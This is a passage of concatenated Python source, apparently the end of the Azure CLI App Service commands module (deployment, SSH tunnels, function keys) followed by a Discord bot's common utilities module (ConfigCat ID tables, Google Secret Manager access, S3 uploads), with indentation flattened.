plan=plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, loc)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
# we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are
# updated we update those
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=loc)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if _is_linux else None,
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
else: # for existing app if we might need to update the stack runtime settings
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
elif os_name.lower() == 'windows' and site_config.windows_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.windows_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, windows_fx_version=runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
# Remove the file after deployment, handling exception if user removed the file manually
try:
os.remove(zip_file_path)
except OSError:
pass
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
def _ping_scm_site(cmd, resource_group, name, instance=None):
from azure.cli.core.util import should_disable_connection_verify
# wake up kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
cookies = {}
if instance is not None:
cookies['ARRAffinity'] = instance
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(),
cookies=cookies)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
# Validate that we have a known instance (case-sensitive)
if instance is not None:
instances = list_instances(cmd, resource_group_name, name, slot=slot)
instance_names = set(i.name for i in instances)
if instance not in instance_names:
if slot is not None:
raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
_ping_scm_site(cmd, resource_group_name, name, instance=instance)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.isAlive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.isAlive() and t.isAlive():
time.sleep(5)
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError('SSH timeout, your app must be running before'
' it can accept SSH connections. '
'Use `az webapp log tail` to review the app startup logs.')
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
c.run('cat /etc/motd', pty=True)
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
raise CLIError('webapp ssh is only supported on linux and mac')
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise CLIError('remote debugging is enabled, please disable')
create_tunnel_and_session(cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def create_devops_pipeline(
cmd,
functionapp_name=None,
organization_name=None,
project_name=None,
repository_name=None,
overwrite_yaml=None,
allow_force_push=None,
github_pat=None,
github_repository=None
):
from .azure_devops_build_interactive import AzureDevopsBuildInteractive
azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
organization_name, project_name, repository_name,
overwrite_yaml, allow_force_push,
github_pat, github_repository)
return azure_devops_build_interactive.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _validate_asp_sku(app_service_environment, sku):
# Isolated SKU is supported only for ASE
if sku in ['I1', 'I2', 'I3']:
if not app_service_environment:
raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
else:
if app_service_environment:
raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and hostname_binding.host_name_type == 'Verified':
verified_hostname_found = True
return verified_hostname_found
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
name,
key_type,
key_name,
slot,
name1=key_name,
value=key_value)
return client.web_apps.create_or_update_host_secret(resource_group_name,
name,
key_type,
key_name,
name1=key_name,
value=key_value)
def list_host_keys(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_host_keys_slot(resource_group_name, name, slot)
return client.web_apps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
result = client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot, raw=True)
result = client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted key '{}' of type '{}' from function app '{}'".format(key_name, key_type, name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Key '{}' of type '{}' does not exist in function app '{}'".format(key_name, key_type, name)
return result
def show_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.get_function(resource_group_name, name, function_name)
if result is None:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def delete_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.delete_function(resource_group_name, name, function_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted function '{}' from app '{}'".format(function_name, name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
name1=key_name,
value=key_value)
return client.web_apps.create_or_update_function_secret(resource_group_name,
name,
function_name,
key_name,
name1=key_name,
value=key_value)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
return client.web_apps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
result = client.web_apps.delete_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
raw=True)
result = client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted key '{}' from function '{}'".format(key_name, function_name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Key '{}' does not exist in function '{}'".format(key_name, function_name)
return result
|
common.py | import asyncio
import io
import json
import logging
import os
import random
import re
import string
import subprocess
import sys
import typing
from pathlib import Path
from typing import Any, Awaitable, Callable, List, Tuple, Union
from threading import Thread
import boto3
import chat_exporter
import configcatclient
import discord
import requests
import sentry_sdk
from botocore.exceptions import ClientError
from discord import (
ApplicationCommandError,
Button,
ButtonStyle,
DiscordException,
SelectOption,
ui,
)
from discord.ext import commands
from dotenv import load_dotenv
from google.cloud import secretmanager
from google_auth_oauthlib.flow import Flow
from google.oauth2.credentials import Credentials
from google.oauth2 import service_account
from oauth2client.service_account import ServiceAccountCredentials
from core import database
load_dotenv()
# global variables
coroutineType = Callable[[Any, Any], Awaitable[Any]]
class ConfigcatClient:
MAIN_ID_CC = configcatclient.create_client(os.getenv("MAINID_CC"))
STAFF_ID_CC = configcatclient.create_client(os.getenv("STAFFID_CC"))
DIGITAL_ID_CC = configcatclient.create_client(os.getenv("DIGITALID_CC"))
TECH_ID_CC = configcatclient.create_client(os.getenv("TECHID_CC"))
MKT_ID_CC = configcatclient.create_client(os.getenv("MKTID_CC"))
TUT_ID_CC = configcatclient.create_client(os.getenv("TUTID_CC"))
CH_ID_CC = configcatclient.create_client(os.getenv("CHID_CC"))
HR_ID_CC = configcatclient.create_client(os.getenv("HRID_CC"))
LEADER_ID_CC = configcatclient.create_client(os.getenv("LEADERID_CC"))
CHECK_DB_CC = configcatclient.create_client(os.getenv("CHECKDB_CC"))
SANDBOX_CONFIG_CC = configcatclient.create_client_with_auto_poll(os.getenv("SANDBOX_CONFIG_CC"), poll_interval_seconds=10)
async def rawExport(self, channel, response, user: discord.User):
transcript = await chat_exporter.export(channel, None)
if transcript is None:
return
embed = discord.Embed(
title="Channel Transcript",
description=f"**Channel:** {channel.name}"
f"\n**User Invoked:** {user.name}*"
f"\nTranscript Attached Below*",
color=discord.Colour.green(),
)
transcript_file = discord.File(
io.BytesIO(transcript.encode()), filename=f"transcript-{channel.name}.html"
)
msg: discord.Message = await response.send(embed=embed, file=transcript_file)
return msg
async def paginate_embed(
bot: discord.Client,
ctx,
embed: discord.Embed,
population_func,
end: int,
begin: int = 1,
page=1,
):
emotes = ["◀️", "▶️"]
def check_reaction(reaction, user):
return user == ctx.author and str(reaction.emoji) in emotes
embed = await population_func(embed, page)
if isinstance(embed, discord.Embed):
message = await ctx.send(embed=embed)
else:
await ctx.send(str(type(embed)))
return
await message.add_reaction(emotes[0])
await message.add_reaction(emotes[1])
while True:
try:
reaction, user = await bot.wait_for(
"reaction_add", timeout=60, check=check_reaction
)
if user == bot.user:
continue
if str(reaction.emoji) == emotes[1] and page < end:
page += 1
embed = await population_func(embed, page)
await message.remove_reaction(reaction, user)
await message.edit(embed=embed)
elif str(reaction.emoji) == emotes[0] and page > begin:
page -= 1
embed = await population_func(embed, page)
await message.remove_reaction(reaction, user)
await message.edit(embed=embed)
except asyncio.TimeoutError:
await message.clear_reactions()
break
def get_extensions():
extensions = []
extensions.append("jishaku")
if sys.platform == "win32" or sys.platform == "cygwin":
dirpath = "\\"
else:
dirpath = "/"
for file in Path("utils").glob("**/*.py"):
if "!" in file.name or "DEV" in file.name:
continue
extensions.append(str(file).replace(dirpath, ".").replace(".py", ""))
return extensions
def load_config(name) -> Tuple[dict, Path]:
config_file = Path(f"utils/bots/RoleSync/{name}.json")
config_file.touch(exist_ok=True)
if config_file.read_text() == "":
config_file.write_text("{}")
with config_file.open("r") as f:
config = json.load(f)
return config, config_file
def prompt_config(msg, key):
config, config_file = load_config()
if key not in config:
config[key] = input(msg)
with config_file.open("w+") as f:
json.dump(config, f, indent=4)
def prompt_config2(msg, key):
config, config_file = load_config()
config[key] = msg
with config_file.open("w+") as f:
json.dump(config, f, indent=4)
def access_secret(
secret_id,
google_auth_load_mode=False,
type_auth=None,
scopes=None,
redirect_uri=None,
):
"""Access credentials and secrets from Google.
Args:
secret_id (str): The secret ID to access. (Options: doc_t, doc_c, tts_c, tsa_c, svc_c, adm_t)
google_auth_load_mode (bool, optional): If marked as True, the function will return a specific credential class for you to authenticate with an API. Defaults to False.
type_auth (int, optional): Type of credential class to return.
(0: oauth2.credentials.Credentials, 1: oauthlib.flow.Flow, 2: oauth2.service_account.Credentials, 3: service_account.ServiceAccountCredentials) Defaults to None.
scopes (list[str], optional): Scopes to access, this is required when using google_auth_load_mode. Defaults to None.
redirect_uri (str, optional): Redirect URL to configure, required when using authentication mode 1. Defaults to None.
Returns:
Credential Object: Returns a credential object that allows you to authenticate with APIs.
"""
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "gsheetsadmin/sstimmy.json"
client = secretmanager.SecretManagerServiceClient()
name = f"projects/ss-timmy/secrets/{secret_id}/versions/latest"
response = client.access_secret_version(request={"name": name})
payload = response.payload.data.decode("UTF-8")
if not google_auth_load_mode:
return payload
else:
with open("cred_file.json", "w") as payload_file:
payload_file.write(payload.replace("'", '"'))
if type_auth == 0:
creds = Credentials.from_authorized_user_file("cred_file.json", scopes)
os.remove("cred_file.json")
elif type_auth == 1:
creds = Flow.from_client_secrets_file(
"cred_file.json", scopes=scopes, redirect_uri=redirect_uri
)
os.remove("cred_file.json")
elif type_auth == 2:
creds = service_account.Credentials.from_service_account_file(
"cred_file.json"
)
os.remove("cred_file.json")
elif type_auth == 3:
payload: dict = json.loads(payload)
creds = ServiceAccountCredentials.from_json_keyfile_dict(payload, scopes)
try:
os.remove("cred_file.json")
except:
pass
return creds
def S3_upload_file(file_name, bucket, object_name=None):
"""Upload a file to an S3 bucket
:param file_name: File to upload
:param bucket: Bucket to upload to
:param object_name: S3 object name. If not specified then file_name is used
:return: True if file was uploaded, else False
"""
# If S3 object_name was not specified, use file_name
if object_name is None:
object_name = os.path.basename(file_name)
# Upload the file
s3_client = boto3.client(
"s3",
aws_access_key_id=os.getenv("AWS_ACCESS_KEY_ID"),
aws_secret_access_key=os.getenv("AWS_SECRET_ACCESS_KEY"),
region_name="us-east-2",
)
try:
response = s3_client.upload_file(
file_name,
bucket,
object_name,
ExtraArgs={"ContentType": "text/html", "ACL": "public-read"},
)
# s3_object = s3_client.Object('ch-transcriptlogs', file_name)
# s3_object.metadata.update({'x-amz-meta-content-type':'text/html'})
# s3_object.copy_from(CopySource={'Bucket':'ch-transcriptlogs', 'x-amz-meta-content-type':'binary/octet-stream'}, Metadata=s3_object.metadata, MetadataDirective='REPLACE')
except ClientError as e:
print(e)
class MAIN_ID:
"""
IDs of the SS Main server.
NOTE: If you want to add IDs, please use the format as below.
Format:
g: discord.Guild
ch: discord.TextChannel, discord.VoiceChannel, discord.StageChannel
cat: discord.CategoryChannel
r: discord.Role
msg: discord.Message
"""
# *** Guilds ***
g_main = int(ConfigcatClient.MAIN_ID_CC.get_value("g_main", 763119924385939498))
ch_commands = int(
ConfigcatClient.MAIN_ID_CC.get_value("ch_commands", 763409002913595412)
)
ch_seniorMods = int(
ConfigcatClient.MAIN_ID_CC.get_value("ch_seniormods", 878792926266810418)
)
ch_moderators = int(
ConfigcatClient.MAIN_ID_CC.get_value("ch_moderators", 786068971048140820)
)
ch_mutedChat = int(
ConfigcatClient.MAIN_ID_CC.get_value("ch_mutedchat", 808919081469739008)
)
ch_modLogs = int(
ConfigcatClient.MAIN_ID_CC.get_value("ch_modlogs", 863177000372666398)
)
ch_tutoring = int(
ConfigcatClient.MAIN_ID_CC.get_value("ch_tutoring", 865716647083507733)
)
ch_transcriptLogs = int(
ConfigcatClient.MAIN_ID_CC.get_value("ch_transcriptlogs", 767434763337728030)
)
ch_actionLogs = int(
ConfigcatClient.MAIN_ID_CC.get_value("ch_actionlogs", 767206398060396574)
)
ch_modCommands = int(
ConfigcatClient.MAIN_ID_CC.get_value("ch_modcommands", 786057630383865858)
)
ch_controlPanel = int(
ConfigcatClient.MAIN_ID_CC.get_value("ch_controlpanel", 843637802293788692)
)
ch_startPrivateVC = int(
ConfigcatClient.MAIN_ID_CC.get_value("ch_startprivatevc", 784556875487248394)
)
ch_announcements = int(
ConfigcatClient.MAIN_ID_CC.get_value("ch_announcements", 763121175764926464)
)
ch_modAnnouncements = int(
ConfigcatClient.MAIN_ID_CC.get_value("ch_modannouncements", 887780215789617202)
)
# *** Categories ***
cat_casual = int(
ConfigcatClient.MAIN_ID_CC.get_value("cat_casual", 763121170324783146)
)
cat_community = int(
ConfigcatClient.MAIN_ID_CC.get_value("cat_community", 800163651805773824)
)
cat_lounge = int(
ConfigcatClient.MAIN_ID_CC.get_value("cat_lounge", 774847738239385650)
)
cat_events = int(
ConfigcatClient.MAIN_ID_CC.get_value("cat_events", 805299289604620328)
)
cat_voice = int(
ConfigcatClient.MAIN_ID_CC.get_value("cat_voice", 763857608964046899)
)
cat_scienceTicket = int(
ConfigcatClient.MAIN_ID_CC.get_value("cat_scienceticket", 800479815471333406)
)
cat_fineArtsTicket = int(
ConfigcatClient.MAIN_ID_CC.get_value("cat_fineartsticket", 833210452758364210)
)
cat_mathTicket = int(
ConfigcatClient.MAIN_ID_CC.get_value("cat_mathticket", 800472371973980181)
)
cat_socialStudiesTicket = int(
ConfigcatClient.MAIN_ID_CC.get_value(
"cat_socialstudiesticket", 800481237608824882
)
)
cat_englishTicket = int(
ConfigcatClient.MAIN_ID_CC.get_value("cat_englishticket", 800475854353596469)
)
cat_essayTicket = int(
ConfigcatClient.MAIN_ID_CC.get_value("cat_essayticket", 854945037875806220)
)
cat_languageTicket = int(
ConfigcatClient.MAIN_ID_CC.get_value("cat_languageticket", 800477414361792562)
)
cat_otherTicket = int(
ConfigcatClient.MAIN_ID_CC.get_value("cat_otherticket", 825917349558747166)
)
cat_privateVC = int(
ConfigcatClient.MAIN_ID_CC.get_value("cat_privatevc", 776988961087422515)
)
# *** Roles ***
r_codingClub = int(
ConfigcatClient.MAIN_ID_CC.get_value("r_codingclub", 883169286665936996)
)
r_debateClub = int(
ConfigcatClient.MAIN_ID_CC.get_value("r_debateclub", 883170141771272294)
)
r_musicClub = int(
ConfigcatClient.MAIN_ID_CC.get_value("r_musicclub", 883170072355561483)
)
r_cookingClub = int(
ConfigcatClient.MAIN_ID_CC.get_value("r_cookingclub", 883162279904960562)
)
r_chessClub = int(
ConfigcatClient.MAIN_ID_CC.get_value("r_chessclub", 883564455219306526)
)
r_bookClub = int(
ConfigcatClient.MAIN_ID_CC.get_value("r_bookclub", 883162511560560720)
)
r_advocacyClub = int(
ConfigcatClient.MAIN_ID_CC.get_value("r_advocacyclub", 883169000866070539)
)
r_speechClub = int(
ConfigcatClient.MAIN_ID_CC.get_value("r_speechclub", 883170166161149983)
)
r_clubPresident = int(
ConfigcatClient.MAIN_ID_CC.get_value("r_clubpresident", 883160826180173895)
)
r_chatHelper = int(
ConfigcatClient.MAIN_ID_CC.get_value("r_chathelper", 811416051144458250)
)
r_leadHelper = int(
ConfigcatClient.MAIN_ID_CC.get_value("r_leadhelper", 810684359765393419)
)
r_essayReviser = int(
ConfigcatClient.MAIN_ID_CC.get_value("r_essayreviser", 854135371507171369)
)
r_tutor = 778453090956738580
# *** Messages ***
# Tutoring
msg_math = int(ConfigcatClient.MAIN_ID_CC.get_value("msg_math", 866904767568543744))
msg_science = int(
ConfigcatClient.MAIN_ID_CC.get_value("msg_science", 866904901174427678)
)
msg_english = int(
ConfigcatClient.MAIN_ID_CC.get_value("msg_english", 866905061182930944)
)
msg_language = int(
ConfigcatClient.MAIN_ID_CC.get_value("msg_language", 866905971519389787)
)
msg_art = int(ConfigcatClient.MAIN_ID_CC.get_value("msg_art", 866906016602652743))
msg_socialStudies = int(
ConfigcatClient.MAIN_ID_CC.get_value("msg_socialstudies", 866905205094481951)
)
msg_computerScience = int(
ConfigcatClient.MAIN_ID_CC.get_value("msg_computerscience", 867550791635566623)
)
class STAFF_ID:
"""
IDs of the SS Staff Community server.
NOTE: If you want to add IDs, please use the format as below.
Format:
g: discord.Guild
ch: discord.TextChannel, discord.VoiceChannel, discord.StageChannel
cat: discord.CategoryChannel
r: discord.Role
msg: discord.Message
"""
# *** Guilds ***
g_staff = int(ConfigcatClient.STAFF_ID_CC.get_value("g_staff", 891521033700540457))
# *** Channels ***
ch_verificationLogs = int(
ConfigcatClient.STAFF_ID_CC.get_value("ch_verificationlogs", 894241199433580614)
)
ch_verification = int(
ConfigcatClient.STAFF_ID_CC.get_value("ch_verification", 894240578651443232)
)
ch_console = int(
ConfigcatClient.STAFF_ID_CC.get_value("ch_console", 895041227123228703)
)
ch_startPrivateVC = int(
ConfigcatClient.STAFF_ID_CC.get_value("ch_startprivatevc", 895041070956675082)
)
ch_announcements = int(ConfigcatClient.STAFF_ID_CC.get_value("ch_announcements", 891920066550059028))
ch_leadershipAnnouncements = int(ConfigcatClient.STAFF_ID_CC.get_value("ch_leadershipannouncements", 910357129972551710))
# *** Categories ***
cat_privateVC = int(
ConfigcatClient.STAFF_ID_CC.get_value("cat_privatevc", 895041016057446411)
)
# *** Roles ***
r_director = int(
ConfigcatClient.STAFF_ID_CC.get_value("r_director", 891521034333880416)
)
r_SSDigitalCommittee = int(
ConfigcatClient.STAFF_ID_CC.get_value("r_ssdigitalcommittee", 898772246808637541)
)
r_chairpersonSSDCommittee = int(
ConfigcatClient.STAFF_ID_CC.get_value("r_chairpersonssdcommittee", 934971902781431869)
)
r_executiveAssistant = int(
ConfigcatClient.STAFF_ID_CC.get_value("r_executiveassistant", 892535575574372372)
)
r_chapterPresident = int(
ConfigcatClient.STAFF_ID_CC.get_value("r_chapterpresident", 892532950019735602)
)
r_organizationPresident = int(
ConfigcatClient.STAFF_ID_CC.get_value("r_organizationpresident", 892532907078475816)
)
r_vicePresident = int(
ConfigcatClient.STAFF_ID_CC.get_value("r_vicepresident", 891521034371608671)
)
r_president = int(
ConfigcatClient.STAFF_ID_CC.get_value("r_president", 932861531224428555)
)
r_editorInChief = int(
ConfigcatClient.STAFF_ID_CC.get_value("r_editorinchief", 910269854592950352)
)
r_corporateOfficer = int(
ConfigcatClient.STAFF_ID_CC.get_value("r_corporateofficer", 932861485917540402)
)
r_CHRO = int(
ConfigcatClient.STAFF_ID_CC.get_value("r_chro", 892530791005978624)
)
r_CIO = int(
ConfigcatClient.STAFF_ID_CC.get_value("r_cio", 892530239996059728)
)
r_CFO = int(
ConfigcatClient.STAFF_ID_CC.get_value("r_cfo", 892530080029503608)
)
r_CMO = int(
ConfigcatClient.STAFF_ID_CC.get_value("r_cmo", 892529974303686726)
)
r_CAO = int(
ConfigcatClient.STAFF_ID_CC.get_value("r_cao", 892530033430790165)
)
r_COO = int(
ConfigcatClient.STAFF_ID_CC.get_value("r_coo", 892530902528307271)
)
r_CEOandPresident = int(
ConfigcatClient.STAFF_ID_CC.get_value("r_ceoandpresident", 892529865247580160)
)
r_boardMember = int(
ConfigcatClient.STAFF_ID_CC.get_value("r_boardmember", 891521034371608675)
)
r_administrativeExecutive = int(
ConfigcatClient.STAFF_ID_CC.get_value("r_administrativeexecutive", 946873101956841473)
)
r_informationTechnology = int(
ConfigcatClient.STAFF_ID_CC.get_value("r_informationtechnology", 891521034333880410)
)
class DIGITAL_ID:
"""
IDs of the SS Staff Community server.
NOTE: If you want to add IDs, please use the format as below.
Format:
g: discord.Guild
ch: discord.TextChannel, discord.VoiceChannel, discord.StageChannel
cat: discord.CategoryChannel
r: discord.Role
msg: discord.Message
"""
# *** Guilds ***
g_digital = int(
ConfigcatClient.DIGITAL_ID_CC.get_value("g_digital", 778406166735880202)
)
# *** Channels ***
ch_verification = int(
ConfigcatClient.DIGITAL_ID_CC.get_value("ch_verification", 878681438462050356)
)
ch_waitingRoom = int(
ConfigcatClient.DIGITAL_ID_CC.get_value("ch_waitingroom", 878679747255750696)
)
ch_announcements = int(ConfigcatClient.DIGITAL_ID_CC.get_value("ch_announcements", 898798323828396052))
ch_notesAnnouncements = int(ConfigcatClient.DIGITAL_ID_CC.get_value("ch_notesannouncements", 934951188149981234))
ch_acadAnnouncements = int(ConfigcatClient.DIGITAL_ID_CC.get_value("ch_acadannouncements", 863615526440534036))
ch_coAnnouncements = int(ConfigcatClient.DIGITAL_ID_CC.get_value("ch_coannouncements", 884256534756991017))
ch_clubAnnouncements = int(ConfigcatClient.DIGITAL_ID_CC.get_value("ch_clubannouncements", 887776723654045696))
ch_mktAnnouncements = int(ConfigcatClient.DIGITAL_ID_CC.get_value("ch_mktannouncements", 863613857116454912))
ch_techAnnouncements = int(ConfigcatClient.DIGITAL_ID_CC.get_value("ch_techannouncements", 863615693597835274))
class TECH_ID:
"""
IDs of the 'The Department of Information & Technology' server.
NOTE: If you want to add IDs, please use the format as below.
Format:
g: discord.Guild
ch: discord.TextChannel, discord.VoiceChannel, discord.StageChannel
cat: discord.CategoryChannel
r: discord.Role
msg: discord.Message
"""
# *** Guilds ***
g_tech = int(ConfigcatClient.TECH_ID_CC.get_value("g_tech", 805593783684562965))
# *** Channels ***
ch_tracebacks = int(
ConfigcatClient.TECH_ID_CC.get_value("ch_tracebacks", 851949397533392936)
)
ch_commissionLogs = int(
ConfigcatClient.TECH_ID_CC.get_value("ch_commissionlogs", 849722616880300061)
)
ch_ticketLog = int(
ConfigcatClient.TECH_ID_CC.get_value("ch_ticketlog", 872915565600182282)
)
ch_botreq = int(
ConfigcatClient.TECH_ID_CC.get_value("ch_botreq", 933181562885914724)
)
ch_announcements = int(ConfigcatClient.TECH_ID_CC.get_value("ch_announcements", 934109939373314068))
